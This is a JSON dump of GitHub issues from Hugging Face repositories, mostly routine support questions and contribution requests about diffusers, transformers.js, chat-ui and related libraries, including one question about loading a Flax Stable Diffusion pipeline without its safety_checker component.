"number": 9031, "title": "how to disable safty_checker in FlaxStableDiffusionPipeline", "body": "### Describe the bug\n\n```\r\n! python3 -m pip install -U tensorflow-cpu\r\nimport diffusers, os\r\npipeline = diffusers.StableDiffusionPipeline.from_single_file('https://huggingface.co/chaowenguo/pal/blob/main/chilloutMix-Ni.safetensors')\r\npipeline.save_pretrained('chilloutMix', safe_serialization=False)\r\npipeline, params = diffusers.FlaxStableDiffusionPipeline.from_pretrained('./chilloutMix', from_pt=True)\r\n```\r\nI always complains\r\n```\r\nPipeline expected {'text_encoder', 'unet', 'scheduler', 'safety_checker', 'feature_extractor', 'vae', 'tokenizer'}, but only {'text_encoder', 'unet', 'scheduler', 'feature_extractor', 'vae', 'tokenizer'} were passed.\r\n```\r\nI want to know how to disable safety_checker in FlaxStableDiffusionPipeline\r\nI try:\r\npipeline, params = diffusers.FlaxStableDiffusionPipeline.from_pretrained('./chilloutMix', from_pt=True, safety_checker=None)\r\nNot working \n\n### Reproduction\n\nN/A\n\n### Logs\n\n_No response_\n\n### System Info\n\nkaggle tpu vm\n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/9031", "state": "open", "labels": [ "bug", "stale" ], "created_at": "2024-08-01T03:48:27Z", "updated_at": "2024-10-13T15:03:54Z", "user": "ghost" }, { "repo": "huggingface/llm.nvim", "number": 106, "title": "How to use openai api?", "body": "I read the code, and it seems support real openai api. But When I set it up something is wrong.\r\nJust make sure if this supports open ai api? I mean realy openai api.", "url": "https://github.com/huggingface/llm.nvim/issues/106", "state": "closed", "labels": [], "created_at": "2024-07-31T23:51:42Z", "updated_at": "2024-10-18T13:49:11Z", "user": "4t8dd" }, { "repo": "huggingface/diffusers", "number": 9025, "title": "how to use FlaxStableDiffusionPipeline with from_single_file in kaggle tpu vm", "body": "### Describe the bug\n\nI have single safetensors file and work on diffusers.StableDiffusionPipeline.from_single_file\r\nNow I want to use FlaxStableDiffusionPipeline but there are not .from_single_file member function in FlaxStableDiffusionPipeline\r\nI need to\r\n```\r\npipeline = diffusers.StableDiffusionPipeline.from_single_file()\r\npipeline.save_pretrained('current')\r\npipeline, params = diffusers.FlaxStableDiffusionPipeline.from_pretrained('./current')\r\n```\r\nNow I get [Error no file named diffusion_flax_model.msgpack or diffusion_pytorch_model.bin found in directory ./current/vae.] there are just diffusion_pytorch_model.safetensors. what I should do to get diffusion_pytorch_model.bin from diffusion_pytorch_model.safetensors\n\n### Reproduction\n\nN/A\n\n### Logs\n\n_No response_\n\n### System Info\n\nkaggle tpu vm \n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/9025", "state": "closed", "labels": [ "bug" ], "created_at": "2024-07-31T10:44:48Z", "updated_at": "2024-08-01T03:59:51Z", "user": "ghost" }, { "repo": "huggingface/transformers.js", "number": 873, "title": "Absolute speaker diarization?", "body": "### Question\n\nI've just managed to integrate the new speaker diarization feature into my project. Very cool stuff. My goal is to let people record meetings, summarize them, and then also list per-speaker tasks. This seems to be a popular feature.\r\n\r\n\r\nOne thing I'm running into is that I don't feed Whisper a single long audio file. Instead I use VAD to feed it small chunks of live audio whenever someone speaks.\r\n\r\nHowever, as far as I can tell the speaker diarization only works \"relatively\", detecting speakers within a single audio file.\r\n\r\nIs there a way to let it detect and 'sort' the correct speaker over multiple audio files? Perhaps it could remember the 'audio fingerprints' of the speakers somehow?\r\n\r\n![record_meeting](https://github.com/user-attachments/assets/3142272f-efad-4766-9614-b996d3f4b080)\r\n", "url": "https://github.com/huggingface/transformers.js/issues/873", "state": "closed", "labels": [ "question" ], "created_at": "2024-07-30T15:09:23Z", "updated_at": "2024-08-12T12:12:07Z", "user": "flatsiedatsie" }, { "repo": "huggingface/transformers.js", "number": 872, "title": "Please provide extensive examples of how to use langchain...", "body": "Here's an example script I'm using, which I believes leverages the ```recursivecharactertextsplitter``` from Langchain. I'd love to replicate my vector db program to the extent I'm able using javascript within a browser but need more examples/help...\r\n\r\n```\r\n\r\n\r\n\r\n \r\n \r\n PDF Text Extraction with Overlapping Chunks\r\n \r\n \r\n\r\n\r\n

Extract Text from PDF

\r\n \r\n \r\n
\r\n \r\n\r\n\r\n```\r\n\r\n
\r\n\r\n
\r\n SCRIPT 2\r\n\r\n```\r\n\r\n\r\n\r\n \r\n \r\n Transformers.js Retrieval Example\r\n\r\n\r\n

Retrieve Relevant Passages

\r\n \r\n
\r\n\r\n    \r\n```\r\n\r\nThat URL is unresolved by the CDN.\r\n\r\nIs version 3 available on any CDN? If so what is the URL? If not is there an alternative to import from browser?\r\n",
    "url": "https://github.com/huggingface/transformers.js/issues/832",
    "state": "closed",
    "labels": [
      "question"
    ],
    "created_at": "2024-06-30T23:39:08Z",
    "updated_at": "2024-10-10T12:23:41Z",
    "user": "geoffroy-noel-ddh"
  },
  {
    "repo": "huggingface/transformers",
    "number": 31717,
    "title": "how to remove kv cache?",
    "body": "### Feature request\n\nWhen I use the generate() function of a language model for inference, the kv-cache is also stored in the GPU memory. Is there any way to clear this kv-cache before continuing to call generate()?\n\n### Motivation\n\nI have a lot of text to process, so I use a for loop to call generate(). To avoid OOM, I need to clear the kv-cache before the end of each loop iteration.\n\n### Your contribution\n\nnone",
    "url": "https://github.com/huggingface/transformers/issues/31717",
    "state": "closed",
    "labels": [
      "Feature request",
      "Generation",
      "Cache"
    ],
    "created_at": "2024-06-30T12:09:48Z",
    "updated_at": "2024-11-05T01:34:42Z",
    "user": "TuuSiwei"
  },
  {
    "repo": "huggingface/accelerate",
    "number": 2904,
    "title": "How to merge Qlora FSDP weights with an LLM and save model.",
    "body": "",
    "url": "https://github.com/huggingface/accelerate/issues/2904",
    "state": "closed",
    "labels": [],
    "created_at": "2024-06-30T07:00:50Z",
    "updated_at": "2024-07-01T14:20:53Z",
    "user": "Minami-su"
  },
  {
    "repo": "huggingface/transformers.js",
    "number": 830,
    "title": "Error while using the library in nextjs (app based route)",
    "body": "### Question\r\n\r\nHello \r\n\r\nI was going through the issues section to find out an solution for the issue i am facing.. I did tried some of the solutions provided by xenova but it seems like I am getting some wasm fallback error which I have no idea whats happening.. I doubt its on webpack but I wanted a clarity. \r\n\r\n\r\nThe error I see is like this while running `npm run dev`\r\n\r\n```\r\n \u2713 Compiled /api/openai in 1500ms (3656 modules)\r\nTypeError: Cannot read properties of undefined (reading 'create')\r\n    at constructSession (webpack-internal:///(rsc)/./node_modules/@xenova/transformers/src/models.js:436:39)\r\n    at async Promise.all (index 1)\r\n    at async BertModel.from_pretrained (webpack-internal:///(rsc)/./node_modules/@xenova/transformers/src/models.js:1007:20)\r\n    at async AutoModel.from_pretrained (webpack-internal:///(rsc)/./node_modules/@xenova/transformers/src/models.js:5026:20)\r\n    at async Promise.all (index 1)\r\n    at async loadItems (webpack-internal:///(rsc)/./node_modules/@xenova/transformers/src/pipelines.js:2838:5)\r\n    at async pipeline (webpack-internal:///(rsc)/./node_modules/@xenova/transformers/src/pipelines.js:2790:21)\r\n    at async HuggingFaceEmbedding.getExtractor (webpack-internal:///(rsc)/./node_modules/llamaindex/dist/embeddings/HuggingFaceEmbedding.js:37:30)\r\n    at async HuggingFaceEmbedding.getTextEmbedding (webpack-internal:///(rsc)/./node_modules/llamaindex/dist/embeddings/HuggingFaceEmbedding.js:44:27)\r\n    at async HuggingFaceEmbedding.getTextEmbeddings (webpack-internal:///(rsc)/./node_modules/llamaindex/dist/embeddings/types.js:30:31)\r\n    at async batchEmbeddings (webpack-internal:///(rsc)/./node_modules/llamaindex/dist/embeddings/types.js:61:32)\r\n    at async HuggingFaceEmbedding.getTextEmbeddingsBatch (webpack-internal:///(rsc)/./node_modules/llamaindex/dist/embeddings/types.js:40:16)\r\n    at async HuggingFaceEmbedding.transform (webpack-internal:///(rsc)/./node_modules/llamaindex/dist/embeddings/types.js:44:28)\r\n    at async VectorStoreIndex.getNodeEmbeddingResults (webpack-internal:///(rsc)/./node_modules/llamaindex/dist/indices/vectorStore/index.js:474:17)\r\n    at async VectorStoreIndex.insertNodes (webpack-internal:///(rsc)/./node_modules/llamaindex/dist/indices/vectorStore/index.js:571:17)\r\n    at async VectorStoreIndex.buildIndexFromNodes (webpack-internal:///(rsc)/./node_modules/llamaindex/dist/indices/vectorStore/index.js:486:9)\r\n    at async VectorStoreIndex.init (webpack-internal:///(rsc)/./node_modules/llamaindex/dist/indices/vectorStore/index.js:436:13)\r\n    at async VectorStoreIndex.fromDocuments (webpack-internal:///(rsc)/./node_modules/llamaindex/dist/indices/vectorStore/index.js:514:16)\r\n    at async getOpenAIModelRequest (webpack-internal:///(rsc)/./src/actions/openai.ts:62:23)\r\n    at async POST (webpack-internal:///(rsc)/./src/app/api/openai/route.ts:11:21)\r\n    at async /Users/jino.jose/rakuten/git/rr-services-version-dashboard/node_modules/next/dist/compiled/next-server/app-route.runtime.dev.js:6:63809\r\n    at async eU.execute (/Users/jino.jose/rakuten/git/rr-services-version-dashboard/node_modules/next/dist/compiled/next-server/app-route.runtime.dev.js:6:53964)\r\n    at async eU.handle (/Users/jino.jose/rakuten/git/rr-services-version-dashboard/node_modules/next/dist/compiled/next-server/app-route.runtime.dev.js:6:65062)\r\n    at async doRender (/opt/homebrew/lib/node_modules/next/dist/server/base-server.js:1333:42)\r\n    at async cacheEntry.responseCache.get.routeKind (/opt/homebrew/lib/node_modules/next/dist/server/base-server.js:1555:28)\r\n    at async DevServer.renderToResponseWithComponentsImpl (/opt/homebrew/lib/node_modules/next/dist/server/base-server.js:1463:28)\r\n    at async DevServer.renderPageComponent (/opt/homebrew/lib/node_modules/next/dist/server/base-server.js:1856:24)\r\n    at async DevServer.renderToResponseImpl (/opt/homebrew/lib/node_modules/next/dist/server/base-server.js:1894:32)\r\n    at async DevServer.pipeImpl (/opt/homebrew/lib/node_modules/next/dist/server/base-server.js:911:25)\r\n    at async NextNodeServer.handleCatchallRenderRequest (/opt/homebrew/lib/node_modules/next/dist/server/next-server.js:271:17)\r\n    at async DevServer.handleRequestImpl (/opt/homebrew/lib/node_modules/next/dist/server/base-server.js:807:17)\r\n    at async /opt/homebrew/lib/node_modules/next/dist/server/dev/next-dev-server.js:331:20\r\n    at async Span.traceAsyncFn (/opt/homebrew/lib/node_modules/next/dist/trace/trace.js:151:20)\r\n    at async DevServer.handleRequest (/opt/homebrew/lib/node_modules/next/dist/server/dev/next-dev-server.js:328:24)\r\n    at async invokeRender (/opt/homebrew/lib/node_modules/next/dist/server/lib/router-server.js:163:21)\r\n    at async handleRequest (/opt/homebrew/lib/node_modules/next/dist/server/lib/router-server.js:342:24)\r\n    at async requestHandlerImpl (/opt/homebrew/lib/node_modules/next/dist/server/lib/router-server.js:366:13)\r\n    at async Server.requestListener (/opt/homebrew/lib/node_modules/next/dist/server/lib/start",
    "url": "https://github.com/huggingface/transformers.js/issues/830",
    "state": "closed",
    "labels": [
      "question"
    ],
    "created_at": "2024-06-29T15:00:09Z",
    "updated_at": "2025-02-10T02:00:25Z",
    "user": "rr-jino-jose"
  },
  {
    "repo": "huggingface/candle",
    "number": 2294,
    "title": "How to get raw tensor data?",
    "body": "I am trying to implement an adaptive avg pool in candle. However, I guess my implementation will require an API to get the raw data/storage (storaged in plain/flatten array format).\r\nWondering if there is such an API for that?\r\n\r\nThanks!",
    "url": "https://github.com/huggingface/candle/issues/2294",
    "state": "open",
    "labels": [],
    "created_at": "2024-06-28T19:19:45Z",
    "updated_at": "2024-06-28T21:51:57Z",
    "user": "WenheLI"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 8730,
    "title": "Implementation of DDIM, why taking Xt and (t-1) as input?",
    "body": "### Describe the bug\n\nI have tried to infer a diffusion model with DDIM with the number of timesteps = 10 and maximize timesteps as 1000. \r\n\r\nI have printed the t in the for-loop, and the result is 901, 801, 801, 701, 601, 501, 401, 301, 201, 101, 1. It's really weird to me why 801 appears two times, and why we start from t=901 instead of t=1000. If we use t=901, we are trying to input x_1000 (the pure noise) and  t_901 to the noise predictor, right? It seems weird because when we train the diffusion model, we feed (x_t, t). I mean, the timestep t should correspond to the version of images x_t. \r\n\r\nI think the implementation may be right and some of my thoughts are wrong. Please kindly tell me the reason. Thank you!!!\n\n### Reproduction\n\nJust add a print in the forward for loop in DDIMPipeline.\n\n### Logs\n\n_No response_\n\n### System Info\n\nI believe this problem is not relevant to the system info.\n\n### Who can help?\n\n@yiyixuxu",
    "url": "https://github.com/huggingface/diffusers/issues/8730",
    "state": "closed",
    "labels": [
      "bug"
    ],
    "created_at": "2024-06-28T18:45:55Z",
    "updated_at": "2024-07-01T17:24:49Z",
    "comments": 1,
    "user": "EPIC-Lab-sjtu"
  },
  {
    "repo": "huggingface/safetensors",
    "number": 490,
    "title": "How to save model checkpoint from a distributed training from multiple nodes?",
    "body": "Hello, \r\n\r\nWhen I use accelerator and deepspeed Zero3 to train the model in one node with 8 GPUs, the following code smoothly saves the model checkpoint\r\n```\r\nds_state_dict = model._zero3_consolidated_16bit_state_dict() # here model is sharded \r\n\r\nif self.accelerator.is_main_process:\r\n    save_file(ds_state_dict, f\"{output_dir}/full_model.safetensors\")\r\n```\r\nHowever, when I move the code to two nodes with each node 8 GPUs, this code does not work.\r\nThe error is like:\r\n\r\n```Some NCCL operations have failed or timed out. Due to the asynchronous nature of CUDA kernels, subsequent GPU operations might run on corrupted/incomplete data.```\r\n\r\nThen I thought maybe I should not call main process only because there are two nodes, so I call the local rank 0 to save\r\n```\r\nds_state_dict = model._zero3_consolidated_16bit_state_dict() # here model is sharded \r\n\r\nif self.accelerator.local_process_index == 0:\r\n    save_file(ds_state_dict, f\"{output_dir}/full_model.safetensors\")\r\n\r\n```\r\n\r\nAnd the error becomes:\r\n```\r\nsave_file(ds_state_dict, f\"{output_dir}/full_model.safetensors\")\r\n  File \"/opt/conda/lib/python3.10/site-packages/safetensors/torch.py\", line 284, in save_file\r\n    serialize_file(_flatten(tensors), filename, metadata=metadata)\r\n  File \"/opt/conda/lib/python3.10/site-packages/safetensors/torch.py\", line 457, in _flatten\r\n    raise ValueError(f\"Expected a dict of [str, torch.Tensor] but received {type(tensors)}\")\r\nValueError: Expected a dict of [str, torch.Tensor] but received \r\n\r\n```\r\nI am not sure in this case, what is the right way to use safetensors to save?",
    "url": "https://github.com/huggingface/safetensors/issues/490",
    "state": "closed",
    "labels": [
      "Stale"
    ],
    "created_at": "2024-06-28T04:59:45Z",
    "updated_at": "2024-07-31T11:46:06Z",
    "user": "Emerald01"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 8728,
    "title": "Using `torchsde.BrownianInterval` instead of `torchsde.BrownianTree` in class `BatchedBrownianTree`",
    "body": "**Is your feature request related to a problem? Please describe.**\r\nWhen I was doing some optimization for my pipeline, i found that the BrownianTree somehow took a bit more time.\r\n\r\n**Describe the solution you'd like.**\r\nI further dig into torchsde document, and found that they encouraged to use `BrownianInterval` to have best benefits for underlying structure utilization. The `BrownianTree` is actually just an abstraction layer of the `BrownianInterval` and as we all know, python function calls take time!\r\n\r\nCode:\r\n```\r\n#diffusers/src/diffusers/schedulers/scheduling_dpmsolver_sde.py:41\r\nself.trees = [torchsde.BrownianTree(t0, w0, t1, entropy=s, **kwargs) for s in seed]\r\n\r\n# Modified\r\nself.trees = [torchsde.BrownianInterval(t0, t1, size=w0.shape, dtype=w0.dtype, device=w0.device, cache_size=None, entropy=s, **kwargs) for s in seed]\r\n```\r\n\r\n**Additional context.**\r\n[torchsde doc link](https://github.com/google-research/torchsde/blob/master/DOCUMENTATION.md)",
    "url": "https://github.com/huggingface/diffusers/issues/8728",
    "state": "closed",
    "labels": [],
    "created_at": "2024-06-28T04:33:55Z",
    "updated_at": "2024-09-12T08:46:54Z",
    "comments": 5,
    "user": "dianyo"
  },
  {
    "repo": "huggingface/transformers.js",
    "number": 826,
    "title": "Support for GLiNER models?",
    "body": "### Question\n\nis there a reason why models from the GLiNER family can't be supported?\r\n\r\nI see they use a specialized library, does it take a lot of code to make them work?",
    "url": "https://github.com/huggingface/transformers.js/issues/826",
    "state": "open",
    "labels": [
      "question"
    ],
    "created_at": "2024-06-28T01:54:37Z",
    "updated_at": "2024-10-04T07:59:16Z",
    "user": "Madd0g"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 8721,
    "title": "how to unload a pipeline",
    "body": "how to unload a pipeline and release the gpu memory",
    "url": "https://github.com/huggingface/diffusers/issues/8721",
    "state": "closed",
    "labels": [],
    "created_at": "2024-06-27T10:04:39Z",
    "updated_at": "2024-07-02T14:40:39Z",
    "user": "nono909090"
  },
  {
    "repo": "huggingface/transformers.js",
    "number": 825,
    "title": "Are there any examples on how to use paligemma model with transformer.js",
    "body": "### Question\n\nFirst of all, thanks for this amazing library! \r\n\r\nSo my questions is, I happened to see this model available on transformers.js:\r\nhttps://huggingface.co/Xenova/paligemma-3b-mix-224\r\n\r\nBut unfortunately I can't find any example on how to run the `image-text-to-text` pipeline. Are there are resources you could kindly point me to? Thanks in advance! \ud83d\ude4f\ud83c\udffb ",
    "url": "https://github.com/huggingface/transformers.js/issues/825",
    "state": "open",
    "labels": [
      "question"
    ],
    "created_at": "2024-06-27T09:49:22Z",
    "updated_at": "2024-06-29T02:39:27Z",
    "user": "alextanhongpin"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 294,
    "title": "after training using lerobot framework\uff0chow to infer the trained policy directly in real environment(ep. aloha code)? i have not found a solution yet",
    "body": "### System Info\n\n```Shell\nos ubuntu20.04,\n```\n\n\n### Information\n\n- [ ] One of the scripts in the examples/ folder of LeRobot\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nnot yet\n\n### Expected behavior\n\nhow to directly eval the policy trained by lerobot in aloha ?",
    "url": "https://github.com/huggingface/lerobot/issues/294",
    "state": "closed",
    "labels": [
      "question",
      "policies",
      "robots",
      "stale"
    ],
    "created_at": "2024-06-27T03:16:19Z",
    "updated_at": "2025-10-23T02:29:25Z",
    "user": "cong1024"
  },
  {
    "repo": "huggingface/chat-ui",
    "number": 1312,
    "title": "[v0.9.1] Error: \"Cannot resolve directory $env\"",
    "body": "## Issue\r\n\r\nFor all client-side components, I get this:\r\n\r\n```\r\n\"Cannot resolve directory $env\"\r\n```\r\n\r\n\"image\"\r\n\r\n\"image\"\r\n\r\n\r\nThis issue prevents a Docker run, because PUBLIC_ASSETS is not found.\r\n\r\n@nsarrazin Please help.\r\n",
    "url": "https://github.com/huggingface/chat-ui/issues/1312",
    "state": "open",
    "labels": [
      "support"
    ],
    "created_at": "2024-06-26T13:24:42Z",
    "updated_at": "2024-06-26T15:14:48Z",
    "comments": 2,
    "user": "adhishthite"
  },
  {
    "repo": "huggingface/chat-ui",
    "number": 1311,
    "title": "400 (no body) trying to reach openai compatible server",
    "body": "Hi everyone,\r\n\r\nI have the following setup (containers are on the same device):\r\n- Container 1: Nvidia NIM (openai-compatible) with Llama3 8B Instruct, port 8000;\r\n- Container 2: chat-ui, port 3000.\r\n\r\nThis is the content of the `.env` file:\r\n```\r\nMONGODB_URL=mongodb://localhost:27017\r\nMONGODB_DB_NAME=chat-ui\r\nMODELS=`[{\"name\":\"Llama3-8B-Instruct\",\"id\":\"Llama3-8B-Instruct\",\"endpoints\":[{\"type\":\"openai\",\"baseURL\":\"http://192.168.120.240:8000/v1\",\"extraBody\":{\"repetition_penalty\":1.1}}]}]`\r\nLOG_LEVEL=debug\r\nALLOW_INSECURE_COOKIES=true\r\n```\r\n\r\nAnd this is the error I get when I try to run inference from browser:\r\n\r\n```\r\n{\"level\":50,\"time\":1719403859826,\"pid\":31,\"hostname\":\"592d634d7447\",\"err\":{\"type\":\"BadRequestError\",\"message\":\"400 status code (no body)\",\"stack\":\"Error: 400 status code (no body)\\n    at APIError.generate (file:///app/build/server/chunks/index-3aabce5f.js:4400:20)\\n    at OpenAI.makeStatusError (file:///app/build/server/chunks/index-3aabce5f.js:5282:25)\\n    at OpenAI.makeRequest (file:///app/build/server/chunks/index-3aabce5f.js:5325:30)\\n    at process.processTicksAndRejections (node:internal/process/task_queues:95:5)\\n    at async file:///app/build/server/chunks/models-e8725572.js:98846:36\\n    at async generateFromDefaultEndpoint (file:///app/build/server/chunks/index3-2417d430.js:213:23)\\n    at async generateTitle (file:///app/build/server/chunks/_server.ts-2c825ade.js:213:10)\\n    at async generateTitleForConversation (file:///app/build/server/chunks/_server.ts-2c825ade.js:177:19)\",\"status\":400,\"headers\":{\"content-length\":\"1980\",\"content-type\":\"application/json\",\"date\":\"Wed, 26 Jun 2024 12:10:59 GMT\",\"server\":\"uvicorn\"}},\"msg\":\"400 status code (no body)\"}\r\nBadRequestError: 400 status code (no body)\r\n    at APIError.generate (file:///app/build/server/chunks/index-3aabce5f.js:4400:20)\r\n    at OpenAI.makeStatusError (file:///app/build/server/chunks/index-3aabce5f.js:5282:25)\r\n    at OpenAI.makeRequest (file:///app/build/server/chunks/index-3aabce5f.js:5325:30)\r\n    at process.processTicksAndRejections (node:internal/process/task_queues:95:5)\r\n    at async file:///app/build/server/chunks/models-e8725572.js:98846:36\r\n    at async generate (file:///app/build/server/chunks/_server.ts-2c825ade.js:426:30)\r\n    at async textGenerationWithoutTitle (file:///app/build/server/chunks/_server.ts-2c825ade.js:487:3) {\r\n  status: 400,\r\n  headers: {\r\n    'content-length': '543',\r\n    'content-type': 'application/json',\r\n    date: 'Wed, 26 Jun 2024 12:10:59 GMT',\r\n    server: 'uvicorn'\r\n  },\r\n  request_id: undefined,\r\n  error: undefined,\r\n  code: undefined,\r\n  param: undefined,\r\n  type: undefined\r\n}\r\n```\r\n\r\nIs there something wrong with the .env file, or is Nvidia NIM simply not supported for some strange reason?",
    "url": "https://github.com/huggingface/chat-ui/issues/1311",
    "state": "open",
    "labels": [
      "support"
    ],
    "created_at": "2024-06-26T12:34:44Z",
    "updated_at": "2024-07-22T13:03:18Z",
    "comments": 2,
    "user": "edesalve"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 8710,
    "title": "Add PAG support to SD1.5",
    "body": "We recently integrated PAG into diffusers! See this PR [here] (https://github.com/huggingface/diffusers/pull/7944) we added PAG to SDXL\r\n\r\nwe also want to add PAG support to SD1.5 pipelines! we will need:\r\n\r\n- [x] StableDiffusionPAGPipeline (assigned to @shauray8, PR https://github.com/huggingface/diffusers/pull/8725)\r\n- [ ] StableDiffusionPAGImg2ImgPipeline https://github.com/huggingface/diffusers/pull/9463\r\n- [ ] StableDiffusionPAGInpaintPipeline\r\n- [ ] StableDiffusionControlNetPAGInpaintPipeline (https://github.com/huggingface/diffusers/pull/8875)\r\n- [x] StableDiffusionControlNetPAGPipeline (assigned to @tuanh123789 )\r\n- [ ] StableDiffusionControlNetPAGImg2ImgPipeline (assigned to @Bhavay-2001 https://github.com/huggingface/diffusers/pull/8864)\r\n\r\n1. You should put it under the [pag folder](https://github.com/huggingface/diffusers/tree/main/src/diffusers/pipelines/pag)\r\n2. you can use the implementation of SDXL PAG pipelines as a reference (see this PRhttps://github.com/huggingface/diffusers/pull/7944 and you can find all the sdxl pag pipelines here https://github.com/huggingface/diffusers/tree/main/src/diffusers/pipelines/pag)\r\n3. you need to add AutoPipeline so that you can use this API to create it\r\n    ```python\r\n       AutoPipelineForImage2Image.from_pretrained(repo_id, controlnet=controlnet, enable_pag=True ...)\r\n   ```\r\n4. tests and docs \r\n\r\nIf you are interested in working on this, Let me know which pipeline(s) you want to work on:) ",
    "url": "https://github.com/huggingface/diffusers/issues/8710",
    "state": "closed",
    "labels": [
      "good first issue",
      "help wanted",
      "contributions-welcome"
    ],
    "created_at": "2024-06-26T08:23:17Z",
    "updated_at": "2024-10-09T20:40:59Z",
    "comments": 17,
    "user": "yiyixuxu"
  },
  {
    "repo": "huggingface/chat-ui",
    "number": 1309,
    "title": "\"404 Resource Not Found\" when using Azure OpenAI model endpoint",
    "body": "I run `chat-ui` with the `chat-ui-db` docker image. I would like to connect it to my Azure OpenAI API endpoint.\r\nI have setup the `env.local` file as stated in your docs and binded it with the docker container:\r\n\r\n```bash\r\nMODELS=`[{\r\n  \"id\": \"gpt-4-1106-preview\",\r\n  \"name\": \"gpt-4-1106-preview\",\r\n  \"displayName\": \"gpt-4-1106-preview\",\r\n  \"parameters\": {\r\n      \"temperature\": 0.5,\r\n      \"max_new_tokens\": 4096,\r\n  },\r\n  \"endpoints\": [\r\n      {\r\n          \"type\": \"openai\",\r\n          \"baseURL\": \"https://{resource-name}.openai.azure.com/openai/deployments/{deployment-id}/chat/completions\",\r\n          \"defaultHeaders\": {\r\n              \"api-key\": \"{api-key}\"\r\n          },\r\n          \"defaultQuery\": {\r\n              \"api-version\": \"{api-version}\"\r\n          }\r\n      }\r\n  ]\r\n}]`\r\n```\r\n\r\nWhen sending a message in `chat-ui`, I get a message `404 Resource Not Found` on the top right of the interface.\r\nWhen I manually send an HTTP request to the Azure OpenAI API endpoint with the same parameters, I get a valid response.\r\nHow can I solve this?",
    "url": "https://github.com/huggingface/chat-ui/issues/1309",
    "state": "open",
    "labels": [
      "support"
    ],
    "created_at": "2024-06-26T07:16:54Z",
    "updated_at": "2024-06-26T18:53:51Z",
    "comments": 2,
    "user": "gqoew"
  },
  {
    "repo": "huggingface/chat-ui",
    "number": 1308,
    "title": "Warning: To load an ES module in Azure environment",
    "body": "Hi Team,\r\n\r\nWe are currently facing issues deploying our Chat UI solution in Azure Web App. The error encountered in the console log is as follows:\r\n\r\n```\r\nnpm http fetch GET 200 https://registry.npmjs.org/npm 141ms\r\n(node:124) Warning: To load an ES module, set \"type\": \"module\" in the package.json or use the .mjs extension.\r\n(Use `node --trace-warnings ...` to show where the warning was created)\r\n/home/site/wwwroot/node_modules/.bin/vite:2\r\nimport { performance } from 'node:perf_hooks'\r\n^^^^^^\r\n\r\nSyntaxError: Cannot use import statement outside a module\r\n    at internalCompileFunction (node:internal/vm:77:18)\r\n    at wrapSafe (node:internal/modules/cjs/loader:1288:20)\r\n    at Module._compile (node:internal/modules/cjs/loader:1340:27)\r\n    at Module._extensions..js (node:internal/modules/cjs/loader:1435:10)\r\n    at Module.load (node:internal/modules/cjs/loader:1207:32)\r\n    at Module._load (node:internal/modules/cjs/loader:1023:12)\r\n    at Function.executeUserEntryPoint [as runMain] (node:internal/modules/run_main:135:12)\r\n    at node:internal/main/run_main_module:28:49\r\n\r\nNode.js v20.11.1\r\nnpm notice \r\nnpm notice New minor version of npm available! 10.5.0 -> 10.8.1\r\nnpm notice Changelog: https://github.com/npm/cli/releases/tag/v10.8.1\r\nnpm notice Run npm install -g npm@10.8.1 to update!\r\nnpm notice \r\n```\r\n\r\n\r\nIt appears to be a Node.js issue, and I believe there might be an error in my package.json configuration. I have tried using both Node.js 18 and 20 without success.\r\n\r\nCould you please provide me with the correct configuration for package.json to resolve this issue?\r\n\r\n\r\n",
    "url": "https://github.com/huggingface/chat-ui/issues/1308",
    "state": "open",
    "labels": [
      "support"
    ],
    "created_at": "2024-06-26T06:04:45Z",
    "updated_at": "2024-06-27T09:07:35Z",
    "comments": 3,
    "user": "pronitagrawalvera"
  },
  {
    "repo": "huggingface/transformers.js",
    "number": 823,
    "title": "How to export q4f16.onnx ",
    "body": "### Question\r\n\r\nThanks for providing such a great project, but I have a problem converting the model.\r\n\r\n\r\n```\r\nFor example:  \r\nmodel_q4f16.onnx\r\n```\r\n\r\n\r\nWhat command is used to create and export such a q4/f16.onnx model?\r\nCan you give me more tips or help? Thank you",
    "url": "https://github.com/huggingface/transformers.js/issues/823",
    "state": "closed",
    "labels": [
      "question"
    ],
    "created_at": "2024-06-26T05:36:47Z",
    "updated_at": "2024-06-26T07:46:57Z",
    "user": "juntaosun"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 8700,
    "title": "[PAG] add `StableDiffusionXLControlNetPAGImg2ImgPipeline`",
    "body": "We recently integrated PAG into diffusers! See the PR here: https://github.com/huggingface/diffusers/pull/7944\r\n\r\nDoes anyone want to add a `StableDiffusionXLControlNetPAGImg2ImgPipeline`?\r\n1. You should put it under the [pag folder](https://github.com/huggingface/diffusers/tree/main/src/diffusers/pipelines/pag)\r\n2. you can use the implementation of [`StableDiffusionXLControlNetPAGPipeline`](https://github.com/huggingface/diffusers/blob/main/src/diffusers/pipelines/pag/pipeline_pag_controlnet_sd_xl.py) and [`StableDiffusionXLPAGImg2ImgPipeline`](https://github.com/huggingface/diffusers/blob/main/src/diffusers/pipelines/pag/pipeline_pag_sd_xl_img2img.py) as reference\r\n3. you need to add AutoPipeline so that you can use this API to create it\r\n    ```python\r\n       AutoPipelineForImage2Image.from_pretrained(repo_id, controlnet=controlnet, enable_pag=True ...)\r\n   ```\r\n4. tests and docs \r\n",
    "url": "https://github.com/huggingface/diffusers/issues/8700",
    "state": "closed",
    "labels": [
      "good first issue",
      "help wanted",
      "contributions-welcome"
    ],
    "created_at": "2024-06-25T18:52:18Z",
    "updated_at": "2024-08-21T17:24:23Z",
    "comments": 6,
    "user": "yiyixuxu"
  },
  {
    "repo": "huggingface/sentence-transformers",
    "number": 2779,
    "title": "what is the default tokenizer when \"No sentence-transformers model found with name\"?",
    "body": "I'm trying to use the sentence-transformer dangvantuan/sentence-camembert-large model and I'm getting a \"no model found\" error. This error is probably because some Sentence-Transformers-specific files are missing in their Huggingface (modules.json and config_sentence_transformers.json). \r\nBut then, Sentence Transformer warns it will create a new model with mean pooling, and this model performs really well on my data (!). \r\nSo, I would like to know what the tokeniser's model is when the model name hasn't been found? ",
    "url": "https://github.com/huggingface/sentence-transformers/issues/2779",
    "state": "closed",
    "labels": [],
    "created_at": "2024-06-25T15:17:58Z",
    "updated_at": "2024-07-05T10:42:27Z",
    "user": "Hortatori"
  },
  {
    "repo": "huggingface/accelerate",
    "number": 2891,
    "title": "How to set a custom Config in python code using Accelerate?",
